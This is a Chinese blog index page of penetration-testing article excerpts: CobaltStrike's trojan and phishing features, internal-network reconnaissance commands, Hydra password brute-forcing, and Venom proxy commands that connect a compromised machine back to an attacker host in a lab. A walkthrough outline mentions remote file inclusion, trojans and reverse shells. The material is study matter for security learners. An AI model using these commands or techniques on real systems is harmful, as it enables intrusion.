![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
渗透测试
文章平均质量分 66
#_##
这个作者很懒,什么都没留下…
展开
-
CobaltStrike使用详解
CobaltStrikeCobaltStrike是一款渗透测试神器,被业界人称为CS神器。CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。CobaltStrike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,windows exe 木马生成,windows dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等强大的功能!CobaltStrike的原创 2021-09-28 22:50:06 · 2160 阅读 · 2 评论 -
内网渗透-内网信息收集
收集本机信息手动收集信息1、查询网络配置信息ipconfig /all2、查询操作系统及软件信息查询操作系统和版本信息systeminfo | findstr /B /C:"OS Name" /C:"OS Version"systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"查看系统体系结构echo %PROCESSOR_ARCHITECTURE%查看安装的软件版本wmic命令wmic product get name,vers原创 2021-09-07 14:09:06 · 215 阅读 · 0 评论 -
渗透测试工具集合
转载自security-360.cn,觉得里面一些信息收集和git的工具挺不错的,可以看看。集合github平台上的安全行业从业者自研开源扫描器的仓库,包括子域名枚举,数据库漏洞扫描,弱口令或信息泄漏扫描,端口扫描,指纹识别以及其他大型扫描器或模块化扫描器。项目地址:https://github.com/We5ter/Scanners-Box子域名枚举扫描器或爆破工具https://github.com/lijiejie/subDomainsBrute(lijiejie开发的一款使用广泛的子域名爆破原创 2021-03-18 21:16:54 · 1223 阅读 · 0 评论 -
hydra工具的使用 (暴力破解密码)及kali自带字典说明
简介kali自带hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码官网:http://www.thc.org/thc-hydra可支持破解密码类型:AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTP原创 2021-08-20 00:01:20 · 17750 阅读 · 0 评论 -
Venom工具的使用(内网渗透 多级代理)
在Moriarty Corp靶场下使用Venom工具穿透内网工具说明:https://github.com/Dliv3/Venom编译好的可执行文件:https://github.com/Dliv3/Venom/releasesadmin监听端口,agent发起连接:./admin_linux_x64 -lport 9999 # 攻击机开启监听./agent_linux_x64 -rhost 192.168.1.100 -rport 9999 # 目标机发起连接agent监原创 2021-08-19 23:24:50 · 3171 阅读 · 0 评论 -
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)
文章目录靶场环境主机发现利用nmap 进行二层扫描利用arp-scan扫描探测文件包含利用远程文件包含 执行木马通过 LFISuite自动化工具 利用文件包含漏洞暴力破解文件上传SSH弱口令# payload反弹# 任意密码修改# 添加代理# 远程代码执行# 内网探测 #个人总结靶场环境攻击机:kali(192.168.1.100)目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24)这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBo原创 2021-08-19 18:27:03 · 2334 阅读 · 0 评论